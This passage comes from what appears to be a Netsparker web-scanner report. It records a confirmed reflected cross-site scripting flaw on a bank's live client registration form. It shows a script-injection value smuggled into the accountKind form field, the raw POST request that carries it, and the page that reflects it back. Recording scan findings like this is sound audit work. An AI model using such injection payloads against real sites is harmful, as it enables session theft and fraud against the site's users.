&lt;option value=&apos;CFEC46&apos; &gt;&amp;nbsp;CFEC46&lt;/option&gt;
&lt;option value=&apos;CFFX&apos; &gt;&amp;nbsp;CFFX&lt;/option&gt;
&lt;option value=&apos;CGFX&apos; &gt;&amp;nbsp;CGFX&lt;/option&gt;
&lt;option value=&apos;CHBC&apos; &gt;&amp;nbsp;CHBC&lt;/option&gt;
&lt;option value=&apos;CLMFX&apos; &gt;&amp;nbsp;CLMFX&lt;/option&gt;
&lt;option value=&apos;CurrClub&apos; &gt;&amp;nbsp;CurrClub&lt;/option&gt;
&lt;option value=&apos;DADD65&apos; &gt;&amp;nbsp;DADD65&lt;/option&gt;
&lt;option value=&apos;DBAA26&apos; &gt;&amp;nbsp;DBAA26&lt;/option&gt;
&lt;option value=&apos;DBAF77&apos; &gt;&amp;nbsp;DBAF77&lt;/option&gt;
&lt;option value=&apos;DBFB93&apos; &gt;&amp;nbsp;DBFB93&lt;/option&gt;
&lt;option value=&apos;DCCD84&apos; &gt;&amp;nbsp;DCCD84&lt;/option&gt;
&lt;option value=&apos;DCEC93&apos; &gt;&amp;nbsp;DCEC93&lt;/option&gt;
&lt;option value=&apos;DDBF26&apos; &gt;&amp;nbsp;DDBF26&lt;/option&gt;
&lt;option value=&apos;DDCC49&apos; &gt;&amp;nbsp;DDCC49&lt;/option&gt;
&lt;option value=&apos;DDDB32&apos; &gt;&amp;nbsp;DDDB32&lt;/option&gt;
&lt;option value=&apos;DEFD33&apos; &gt;&amp;nbsp;DEFD33&lt;/option&gt;
&lt;option value=&apos;DF56NB&apos; &gt;&amp;nbsp;DF56NB&lt;/option&gt;
&lt;option value=&apos;DF794J0&apos; &gt;&amp;nbsp;DF794J0&lt;/option&gt;
&lt;option value=&apos;DFAF50&apos; &gt;&amp;nbsp;DFAF50&lt;/option&gt;
&lt;option value=&apos;DG785&apos; &gt;&amp;nbsp;DG785&lt;/option&gt;
&lt;option value=&apos;DOXX&apos; &gt;&amp;nbsp;DOXX&lt;/option&gt;
&lt;option value=&apos;DRFX1&apos; &gt;&amp;nbsp;DRFX1&lt;/option&gt;
&lt;option value=&apos;DSBP&apos; &gt;&amp;nbsp;DSBP&lt;/option&gt;
&lt;option value=&apos;EACE93&apos; &gt;&amp;nbsp;EACE93&lt;/option&gt;
&lt;option value=&apos;EADA74&apos; &gt;&amp;nbsp;EADA74&lt;/option&gt;
&lt;option value=&apos;EAEE21&apos; &gt;&amp;nbsp;EAEE21&lt;/option&gt;
&lt;option value=&apos;EAFD36&apos; &gt;&amp;nbsp;EAFD36&lt;/option&gt;
&lt;option value=&apos;EBAD44&apos; &gt;&amp;nbsp;EBAD44&lt;/option&gt;
&lt;option value=&apos;EBBB34&apos; &gt;&amp;nbsp;EBBB34&lt;/option&gt;
&lt;option value=&apos;EBDE90&apos; &gt;&amp;nbsp;EBDE90&lt;/option&gt;
&lt;option value=&apos;ECURRENTZ&apos; &gt;&amp;nbsp;ECURRENTZ&lt;/option&gt;
&lt;option value=&apos;EDCC46&apos; &gt;&amp;nbsp;EDCC46&lt;/option&gt;
&lt;option value=&apos;EFAF70&apos; &gt;&amp;nbsp;EFAF70&lt;/option&gt;
&lt;option value=&apos;EFBB17&apos; &gt;&amp;nbsp;EFBB17&lt;/option&gt;
&lt;option value=&apos;EFCA50&apos; &gt;&amp;nbsp;EFCA50&lt;/option&gt;
&lt;option value=&apos;EFCA92&apos; &gt;&amp;nbsp;EFCA92&lt;/option&gt;
&lt;option value=&apos;FAAC62&apos; &gt;&amp;nbsp;FAAC62&lt;/option&gt;
&lt;option value=&apos;FBDB80&apos; &gt;&amp;nbsp;FBDB80&lt;/option&gt;
&lt;option value=&apos;FBDF30&apos; &gt;&amp;nbsp;FBDF30&lt;/option&gt;
&lt;option value=&apos;FBED79&apos; &gt;&amp;nbsp;FBED79&lt;/option&gt;
&lt;option value=&apos;FBFA65&apos; &gt;&amp;nbsp;FBFA65&lt;/option&gt;
&lt;option value=&apos;FCCA80&apos; &gt;&amp;nbsp;FCCA80&lt;/option&gt;
&lt;option value=&apos;FDAG&apos; &gt;&amp;nbsp;FDAG&lt;/option&gt;
&lt;option value=&apos;FEEC47&apos; &gt;&amp;nbsp;FEEC47&lt;/option&gt;
&lt;option value=&apos;FFFF98&apos; &gt;&amp;nbsp;FFFF98&lt;/option&gt;
&lt;option value=&apos;FGB1WFM&apos; &gt;&amp;nbsp;FGB1WFM&lt;/option&gt;
&lt;option value=&apos;FGH7GB&apos; &gt;&amp;nbsp;FGH7GB&lt;/option&gt;
&lt;option value=&apos;FGH90IK&apos; &gt;&amp;nbsp;FGH90IK&lt;/option&gt;
&lt;option value=&apos;FIBX1&apos; &gt;&amp;nbsp;FIBX1&lt;/option&gt;
&lt;option value=&apos;FORMA&apos; &gt;&amp;nbsp;FORMA&lt;/option&gt;
&lt;option value=&apos;FORT&apos; &gt;&amp;nbsp;FORT&lt;/option&gt;
&lt;option value=&apos;FRAPX&apos; &gt;&amp;nbsp;FRAPX&lt;/option&gt;
&lt;option value=&apos;FTAM&apos; &gt;&amp;nbsp;FTAM&lt;/option&gt;
&lt;option value=&apos;FXDASH1A&apos; &gt;&amp;nbsp;FXDASH1A&lt;/option&gt;
&lt;option value=&apos;FXG1&apos; &gt;&amp;nbsp;FXG1&lt;/option&gt;
&lt;option value=&apos;FXMN&apos; &gt;&amp;nbsp;FXMN&lt;/option&gt;
&lt;option value=&apos;FXPOR&apos; &gt;&amp;nbsp;FXPOR&lt;/option&gt;
&lt;option value=&apos;FXRGC&apos; &gt;&amp;nbsp;FXRGC&lt;/option&gt;
&lt;option value=&apos;G7NV&apos; &gt;&amp;nbsp;G7NV&lt;/option&gt;
&lt;option value=&apos;GHJKL76&apos; &gt;&amp;nbsp;GHJKL76&lt;/option&gt;
&lt;option value=&apos;GLCM&apos; &gt;&amp;nbsp;GLCM&lt;/option&gt;
&lt;option value=&apos;GSYE&apos; &gt;&amp;nbsp;GSYE&lt;/option&gt;
&lt;option value=&apos;GTG67H&apos; &gt;&amp;nbsp;GTG67H&lt;/option&gt;
&lt;option value=&apos;GTXX&apos; &gt;&amp;nbsp;GTXX&lt;/option&gt;
&lt;option value=&apos;HJH768&apos; &gt;&amp;nbsp;HJH768&lt;/option&gt;
&lt;option value=&apos;HKJBXF&apos; &gt;&amp;nbsp;HKJBXF&lt;/option&gt;
&lt;option value=&apos;HRAPX&apos; &gt;&amp;nbsp;HRAPX&lt;/option&gt;
&lt;option value=&apos;HUSK&apos; &gt;&amp;nbsp;HUSK&lt;/option&gt;
&lt;option value=&apos;IDTX&apos; &gt;&amp;nbsp;IDTX&lt;/option&gt;
&lt;option value=&apos;IDTX1&apos; &gt;&amp;nbsp;IDTX1&lt;/option&gt;
&lt;option value=&apos;IDTX2&apos; &gt;&amp;nbsp;IDTX2&lt;/option&gt;
&lt;option value=&apos;IDTX3&apos; &gt;&amp;nbsp;IDTX3&lt;/option&gt;
&lt;option value=&apos;INHH&apos; &gt;&amp;nbsp;INHH&lt;/option&gt;
&lt;option value=&apos;ITASCA&apos; &gt;&amp;nbsp;ITASCA&lt;/option&gt;
&lt;option value=&apos;JDCFX&apos; &gt;&amp;nbsp;JDCFX&lt;/option&gt;
&lt;option value=&apos;JLS&apos; &gt;&amp;nbsp;JLS&lt;/option&gt;
&lt;option value=&apos;JSDM&apos; &gt;&amp;nbsp;JSDM&lt;/option&gt;
&lt;option value=&apos;KRCM1&apos; &gt;&amp;nbsp;KRCM1&lt;/option&gt;
&lt;option value=&apos;KRCM2&apos; &gt;&amp;nbsp;KRCM2&lt;/option&gt;
&lt;option value=&apos;LBMFX&apos; &gt;&amp;nbsp;LBMFX&lt;/option&gt;
&lt;option value=&apos;LBXX2&apos; &gt;&amp;nbsp;LBXX2&lt;/option&gt;
&lt;option value=&apos;LMXX&apos; &gt;&amp;nbsp;LMXX&lt;/option&gt;
&lt;option value=&apos;LivIn&apos; &gt;&amp;nbsp;LivIn&lt;/option&gt;
&lt;option value=&apos;MASI&apos; &gt;&amp;nbsp;MASI&lt;/option&gt;
&lt;option value=&apos;MBCM&apos; &gt;&amp;nbsp;MBCM&lt;/option&gt;
&lt;option value=&apos;MBCO&apos; &gt;&amp;nbsp;MBCO&lt;/option&gt;
&lt;option value=&apos;MDLV&apos; &gt;&amp;nbsp;MDLV&lt;/option&gt;
&lt;option value=&apos;MEIDAO&apos; &gt;&amp;nbsp;MEIDAO&lt;/option&gt;
&lt;option value=&apos;NK71&apos; &gt;&amp;nbsp;NK71&lt;/option&gt;
&lt;option value=&apos;NKHFX&apos; &gt;&amp;nbsp;NKHFX&lt;/option&gt;
&lt;option value=&apos;OANFx5&apos; &gt;&amp;nbsp;OANFx5&lt;/option&gt;
&lt;option value=&apos;OANFx55&apos; &gt;&amp;nbsp;OANFx55&lt;/option&gt;
&lt;option value=&apos;OGFX&apos; &gt;&amp;nbsp;OGFX&lt;/option&gt;
&lt;option value=&apos;PAXX&apos; &gt;&amp;nbsp;PAXX&lt;/option&gt;
&lt;option value=&apos;PORFX&apos; &gt;&amp;nbsp;PORFX&lt;/option&gt;
&lt;option value=&apos;PRSP&apos; &gt;&amp;nbsp;PRSP&lt;/option&gt;
&lt;option value=&apos;PURK1&apos; &gt;&amp;nbsp;PURK1&lt;/option&gt;
&lt;option value=&apos;RGCSR&apos; &gt;&amp;nbsp;RGCSR&lt;/option&gt;
&lt;option value=&apos;RJPFX&apos; &gt;&amp;nbsp;RJPFX&lt;/option&gt;
&lt;option value=&apos;RMJ&apos; &gt;&amp;nbsp;RMJ&lt;/option&gt;
&lt;option value=&apos;RNKFX&apos; &gt;&amp;nbsp;RNKFX&lt;/option&gt;
&lt;option value=&apos;ROXX&apos; &gt;&amp;nbsp;ROXX&lt;/option&gt;
&lt;option value=&apos;RSFX&apos; &gt;&amp;nbsp;RSFX&lt;/option&gt;
&lt;option value=&apos;RUSLION&apos; &gt;&amp;nbsp;RUSLION&lt;/option&gt;
&lt;option value=&apos;Rio2016&apos; &gt;&amp;nbsp;Rio2016&lt;/option&gt;
&lt;option value=&apos;SARK&apos; &gt;&amp;nbsp;SARK&lt;/option&gt;
&lt;option value=&apos;SEP1&apos; &gt;&amp;nbsp;SEP1&lt;/option&gt;
&lt;option value=&apos;SKUSN&apos; &gt;&amp;nbsp;SKUSN&lt;/option&gt;
&lt;option value=&apos;SMXX&apos; &gt;&amp;nbsp;SMXX&lt;/option&gt;
&lt;option value=&apos;SOUK&apos; &gt;&amp;nbsp;SOUK&lt;/option&gt;
&lt;option value=&apos;SRVFX&apos; &gt;&amp;nbsp;SRVFX&lt;/option&gt;
&lt;option value=&apos;STAC&apos; &gt;&amp;nbsp;STAC&lt;/option&gt;
&lt;option value=&apos;STAR+&apos; &gt;&amp;nbsp;STAR+&lt;/option&gt;
&lt;option value=&apos;SVTL&apos; &gt;&amp;nbsp;SVTL&lt;/option&gt;
&lt;option value=&apos;TC4ET&apos; &gt;&amp;nbsp;TC4ET&lt;/option&gt;
&lt;option value=&apos;TFGINC&apos; &gt;&amp;nbsp;TFGINC&lt;/option&gt;
&lt;option value=&apos;VASCON1&apos; &gt;&amp;nbsp;VASCON1&lt;/option&gt;
&lt;option value=&apos;VASCON2&apos; &gt;&amp;nbsp;VASCON2&lt;/option&gt;
&lt;option value=&apos;VASCON3&apos; &gt;&amp;nbsp;VASCON3&lt;/option&gt;
&lt;option value=&apos;VFGL5112&apos; &gt;&amp;nbsp;VFGL5112&lt;/option&gt;
&lt;option value=&apos;VHGLNM678&apos; &gt;&amp;nbsp;VHGLNM678&lt;/option&gt;
&lt;option value=&apos;VKCS52&apos; &gt;&amp;nbsp;VKCS52&lt;/option&gt;
&lt;option value=&apos;VNG409CG&apos; &gt;&amp;nbsp;VNG409CG&lt;/option&gt;
&lt;option value=&apos;Vulov10&apos; &gt;&amp;nbsp;Vulov10&lt;/option&gt;
&lt;option value=&apos;W2WFX&apos; &gt;&amp;nbsp;W2WFX&lt;/option&gt;
&lt;option value=&apos;WDFX&apos; &gt;&amp;nbsp;WDFX&lt;/option&gt;
&lt;option value=&apos;WDFX2&apos; &gt;&amp;nbsp;WDFX2&lt;/option&gt;
&lt;option value=&apos;WDXX&apos; &gt;&amp;nbsp;WDXX&lt;/option&gt;
&lt;option value=&apos;XYWFX&apos; &gt;&amp;nbsp;XYWFX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[extManAnswer]&quot; value=&quot;Yes&quot; id=extManContact0&gt;&lt;label for=extManContact0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the External Manager is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the External Manager and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my External Manager&amp;#039;s acts or omissions.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;&lt;br&gt;
          &lt;/td&gt;
        &lt;/tr&gt;

        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;200&quot; id=&quot;radio_accountKind_200&quot; checked onClick=&quot;fSetServProviderMode(true);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_200&quot;&gt;Service Provider&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_servProvider&quot; &gt;
			          
            &lt;b&gt;Whilst selecting your Service Provider and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Service Provider and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Service Provider&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[serviceProvider]&quot; id=&quot;sel_mas2&quot;&gt;
		      &lt;option value=&apos;BBAC47&apos; &gt;&amp;nbsp;BBAC47&lt;/option&gt;
&lt;option value=&apos;BUSH1&apos; &gt;&amp;nbsp;BUSH1&lt;/option&gt;
&lt;option value=&apos;BUSH2&apos; &gt;&amp;nbsp;BUSH2&lt;/option&gt;
&lt;option value=&apos;GNM87FV&apos; &gt;&amp;nbsp;GNM87FV&lt;/option&gt;
&lt;option value=&apos;KRC1&apos; &gt;&amp;nbsp;KRC1&lt;/option&gt;
&lt;option value=&apos;KRC2&apos; &gt;&amp;nbsp;KRC2&lt;/option&gt;
&lt;option value=&apos;KRC3&apos; &gt;&amp;nbsp;KRC3&lt;/option&gt;
&lt;option value=&apos;TINL&apos; &gt;&amp;nbsp;TINL&lt;/option&gt;
&lt;option value=&apos;ZUXX&apos; &gt;&amp;nbsp;ZUXX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[servProviderAnswer]&quot; value=&quot;Yes&quot; id=servProvider0&gt;&lt;label for=servProvider0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the Service Provider is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the Service Provider and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my Service Provider&amp;#039;s acts or omissions. I hereby acknowledge and agree that Dukascopy Bank SA may communicate my UIN and e-mail address to the Service Provider.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;				
          &lt;/td&gt;
        &lt;/tr&gt;

      &lt;/table&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
     &lt;td colspan=&quot;2&quot; align=&quot;center&quot;&gt;
     &lt;div id=&quot;infoWTXX&quot;&gt;        
      &lt;/div&gt;
      &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;buttons&quot;&gt;
      &lt;input class=&quot;button&quot; type=&quot;submit&quot; name=&quot;next&quot; value=&quot;Submit&quot;&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;info&quot; style=&quot;padding:20 0 0 0;&quot;&gt;
  MINIMUM AMOUNT TO BE DEPOSITED&lt;br/&gt;TO OPEN A LIVE TRADING ACCOUNT IS 1 000 USD&lt;br/&gt;
(OR ITS EQUIVALENT IN OTHER CURRENCIES).&lt;br/&gt;
&lt;br/&gt;&lt;b&gt;Filling the application form, please use Latin letters only!&lt;/b&gt;&lt;br/&gt;
&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;
	&lt;/td&gt;
  &lt;/tr&gt;
&lt;input type=&quot;hidden&quot; name=&quot;aData[HTTP_REFERER]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;backFormMarker&quot; value=&quot;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;currentFormMarker&quot; value=&quot;step1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;nextFormMarker&quot; value=&quot;step2&quot;&gt;&lt;span style=display:none; id=hidHtmlConvert&gt;&lt;/span&gt;&lt;script&gt;
                function fFillFormField (oElement, value)    {
                    try {
                        switch(oElement.tagName) {
                            case &quot;TEXTAREA&quot;:
                            case &quot;TEXT&quot;:
                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
								// oElement.value = value;
                            break;
                            case &quot;SELECT&quot;:
                                oElement.value = value;
                                bFound = false;
                                for (i=0; i&lt;oElement.options.length; i++)    {
                                    if(oElement.options[i].value == value)    {
                                        oElement.options[i].selected = true;
                                        bFound = true;
                                        break;
                                    }
                                }
                                if(value &amp;&amp; !bFound)    {
                                    oNew = document.createElement(&quot;OPTION&quot;);
                                    oNew.value = value;
                                    oNew.innerHTML = value;
                                    oElement.appendChild(oNew);
                                    oElement.lastChild.selected = true;
                                }
                            break;
                            default:
                                if(oElement.length)    {
                                    for(i=0;i&lt;oElement.length;i++)    {
                                        if(oElement[i].value == value)
                                            oElement[i].click();
                                        else
                                            oElement[i].checked = false;
                                    }
                                }
                                else {
                                    if(oElement.type == &quot;checkbox&quot;)
                                        oElement.click();
                                    else {
		                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
		                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
                                    //  oElement.value = value;
                                        }
                                }
                            break;
                        }
                        try    {
                            oElement.fireEvent(&quot;onchange&quot;);
                        }
                        catch(e) {
                            try {
                                var evt = document.createEvent(&quot;HTMLEvents&quot;);
                                evt.initEvent(&quot;change&quot;,true,true);
                                oElement.dispatchEvent( evt );
                            }
                            catch(e){}
                        }
                    }
                    catch(e){}
                }
                function fFillForm()    {
fFillFormField(document.mainForm[&quot;aData[STRAT_REF]&quot;], &quot;-1&quot;);
fFillFormField(document.mainForm[&quot;aData[FEEDBACK_URL]&quot;], &quot;-1&quot;);
fFillFormField(document.mainForm[&quot;aData[TYPE]&quot;], &quot;\&apos;\&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000165)&lt;/script&gt;&quot;);
fFillFormField(document.mainForm[&quot;aData[accountKind]&quot;], &quot;200&quot;);
fFillFormField(document.mainForm[&quot;aData[servProviderAnswer]&quot;], &quot;Yes&quot;);}&lt;/script&gt;&lt;/form&gt;
&lt;/table&gt;
&lt;img id=&quot;progress_img&quot; src=&quot;../../images/progress_bar.gif&quot; width=&quot;69&quot; height=&quot;17&quot; border=&quot;0&quot; style=&quot;display:none;&quot;&gt;
  &lt;/body&gt;
&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://live-login.dukascopy.com/fo/register/live/index.php</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>aData%5BaccountKind%5D</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000169)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /fo/register/live/index.php HTTP/1.1
Referer: https://live-login.dukascopy.com/fo/register/live/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: live-login.dukascopy.com
Content-Length: 333
Accept-Encoding: gzip, deflate

aData%5BSTRAT_REF%5D=-1&amp;aData%5BFEEDBACK_URL%5D=-1&amp;aData%5BTYPE%5D=2&amp;aData%5BaccountKind%5D=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000169)%3c%2fscript%3e&amp;aData%5BserviceProvider%5D=BBAC47&amp;aData%5BservProviderAnswer%5D=Yes&amp;aData%5BHTTP_REFERER%5D=3&amp;backFormMarker=3&amp;currentFormMarker=step1&amp;nextFormMarker=step2
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Date: Thu, 17 Mar 2011 19:25:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.3
Transfer-Encoding: chunked
Content-Type: text/html; charset=windows-1252



&lt;html lang=&quot;en&quot;&gt;
  &lt;head&gt;
    &lt;title&gt;Client Registration&lt;/title&gt;
    &lt;META http-equiv=Content-Type content=&quot;text/html; charset=windows-1252&quot;&gt;
    &lt;script&gt;
      function init()  {
        fFillForm();
      }

      var bShowWaiting = true;

      function showWaiting()  {
        if(bShowWaiting)  {
          for (odj in document.body.childNodes)
            try  {
	            document.body.childNodes[odj].style.display = &apos;none&apos;;
	          }catch(e){}

	        oProgressDiv = document.createElement(&apos;div&apos;);
	        document.body.appendChild(oProgressDiv);
	        oProgressDiv.align = &apos;center&apos;;
	        oProgressDiv.innerHTML = &quot;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;Please, wait&lt;br/&gt;&quot;;

	        tmp = document.getElementById(&apos;progress_img&apos;)
	        oProgressImg = tmp.cloneNode(false);
	        oProgressImg.style.display = &apos;block&apos;;
	        oProgressDiv.appendChild(oProgressImg);
	        bShowWaiting = false;
	      }
      }

    function addEventHandler(obj, type, func, useCapture) {
        if (obj.addEventListener) {
            obj.addEventListener(type, func, useCapture);
            return true;
        }
        else if (obj.attachEvent) {
            var r = obj.attachEvent(&apos;on&apos; + type, func);
            return r;
    	}
        else {
            obj[&apos;on&apos; + type] = func;
        }
    }

    tipIndex = 0;
    function drawTip (sTip, width) {
        this.hideDelay = 600;
        this.sTip = sTip;
        this.hideTimeoutId = null;
        var oThis = this;

        this.show = function (event) {
            var oEvent = (event || window.event);
            if (oThis.hideTimeoutId) {
                window.clearTimeout(oThis.hideTimeoutId);
                return;
            } else if (oThis.oTipContainer.style.display == &quot;block&quot;) {
                return;
            }
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;hidden&apos;;
            }
            oThis.oTipContainer.style.top = oEvent.clientY - oThis.oTipContainer.offsetHeight - 2;
            oThis.oTipContainer.style.left = oEvent.clientX + 3;
            oThis.oTipContainer.style.display = &quot;block&quot;;
        }

        this.hide = function () {
            oThis.hideTimeoutId = null;
            oThis.oTipContainer.style.display = &quot;none&quot;;
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;&apos;;
            }
        }

        this.hideTimeouted = function () {
            oThis.hideTimeoutId = window.setTimeout(oThis.hide, oThis.hideDelay);
        }

        document.write(&apos;&lt;img src=&quot;../../images/icons/16x16/tip.png&quot; align=&quot;absmiddle&quot; height=&quot;16&quot; width=&quot;16&quot; border=&quot;0&quot; id=&quot;tipImg&apos; + tipIndex + &apos;&quot;/&gt;&apos;);
        document.write(&apos;&lt;div class=&quot;tip&quot; style=&quot;display:none;&quot; id=&quot;tipContainer&apos; + tipIndex + &apos;&quot;&gt;&apos; + sTip + &apos;&lt;/div&gt;&apos;);

        this.oTipImg = document.getElementById(&apos;tipImg&apos; + tipIndex);
        this.oTipContainer = document.getElementById(&apos;tipContainer&apos; + tipIndex);
        if (typeof(width) != &apos;undefined&apos;)
            this.oTipContainer.style.width = width;
        addEventHandler(this.oTipImg, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipContainer, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipImg, &apos;mouseout&apos;, this.hideTimeouted);
        addEventHandler(this.oTipContainer, &apos;mouseout&apos;, this.hideTimeouted);
        tipIndex++;
    }
    &lt;/script&gt;
    &lt;!--&lt;script src=&quot;js/lib.js&quot;&gt;&lt;/script&gt;
    &lt;script src=&quot;js/checkForm.js&quot;&gt;&lt;/script&gt;--&gt;
  &lt;style&gt;
  body, td, span, div, p, tr, th, option, font, button, input, select, textarea, b, i, a {
    font-size:8pt;
    font-family:Verdana;
  }
  table  {
   table-layout:fixed;
  }
  a  {
    font-weight:bold;
    text-decoration:underline;
    color:black;
  }

  a:hover  {
    color:#666666;
  }

  .header  {
    font-size:11pt;
    height:24px;
    color:#FFFFFF;
    font-weight:bold;
    text-align:center;
    background-image: url(&apos;https://www.dukascopy.com/swiss/inc/images/headline_bg_menu.gif&apos;);
    background-color:#000;
    background-position:0px 0px;
    background-repeat:repeat-x;
  }

  .header a  {
    color:#FFFFFF;
    font-weight:bold;
    text-decoration:none;
  }

  .header a:hover  {
    color:#FFFFFF;
    text-decoration:underline;
  }

  .subheader  {
    font-size:10pt;
    color:#333333;
    font-weight:bold;
    text-align:center;
    padding:5 0 0 0;
  }

 .subheader *  {
    font-size:10pt;
    font-weight:bold;
  }

  .step  {
    font-size:10pt;
    color:#999999;
    font-weight:bold;
    text-align:center;
    padding:5 0 5 0;
  }
  .error  {
    font-size:10pt;
    color:#EE0000;
    text-align:center;
    padding:5 0 5 0;
    font-weight:bold;
  }
  .title  {
    text-align:right;
    width:50%;
    padding:2 2 2 2;
    color:#1D4470;
  }
  .field  {
    text-align:left;
    width:50%;
    padding:2 22 2 2;
  }
  .buttons  {
    text-align:center;
    padding:4 4 4 4;
  }
  .button  {
    color:white;
    border:1px outset;
    cursor:pointer;
    background-color:#1D4470;
    width:100px;
    font-weight:bold;
    height:13pt;
  }
  .info  {
    text-align:center;
    padding-left:22;
    padding-right:22;
  }
  input.text  {
    width:100%;
    border-top:1px solid #cccccc;
    border-right:1px solid #cccccc;
    border-bottom:1px solid #cccccc;
    border-left:1px solid #cccccc;
  }
  input.checkbox {

  }
  textarea  {
    width:100%;
    border:1px solid #cccccc;
    font-size:8pt !important;
    font-weight:normal !important;
  }
  select {
    border:1px solid #cccccc;
  }

  .tip {
    position:absolute;
    border: 1px solid #333333;
    background-color: #FFFFE1;
    width: 250px;
    padding: 7px;
    text-align: justify;
    z-index:100;
  }

  &lt;/style&gt;
  &lt;/head&gt;
  &lt;body onLoad=&quot;init();&quot; onBeforeUnload=&quot;showWaiting();&quot; style=&quot;margin:0px;padding:0px;&quot;&gt;
  &lt;div style=&quot;background:url(&apos;https://www.dukascopy.com/pics/topBackground.png&apos;) repeat-x;&quot;&gt;&lt;img src=&quot;https://www.dukascopy.com/pics/headers/website_logo_bank.jpg&quot; alt=&quot;Dukascopy&quot; style=&quot;width:579px;height:103px;border:none;&quot;&gt;&lt;/div&gt;
  &lt;table width=&quot;100%&quot; align=&quot;center&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
&lt;form style=&quot;margin:0px;padding:0px;&quot; name=&quot;mainForm&quot; action=&quot;/fo/register/live/index.php&quot; method=&quot;post&quot;&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;header&quot;&gt;
      Client Registration
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;step&quot;&gt;
      Step 1 of 6-12
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot;&gt;
      &lt;div class=&quot;error&quot; id=topError&gt;
      	      &lt;div&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Date:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      Thu, 17 Mar 2011    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Status:
    &lt;/td&gt;
    &lt;script&gt;
    	function radioClickControll() {
    		var retAcc = document.getElementById(&apos;radio_accountKind_6&apos;);
    		var stAcc  = document.getElementById(&apos;radio_accountKind_7&apos;);
    		var rInd   = document.getElementById(&apos;radio_type_1&apos;);
    		var rJoint = document.getElementById(&apos;radio_type_3&apos;);
    		var rLegal = document.getElementById(&apos;radio_type_2&apos;);

    		if(retAcc.checked) {
    			rLegal.disabled = true;
    		}
    		if(stAcc.checked) {
    			rLegal.disabled = false;
    		}

    		if(rLegal.checked) {
    			retAcc.disabled = true;
    		} 
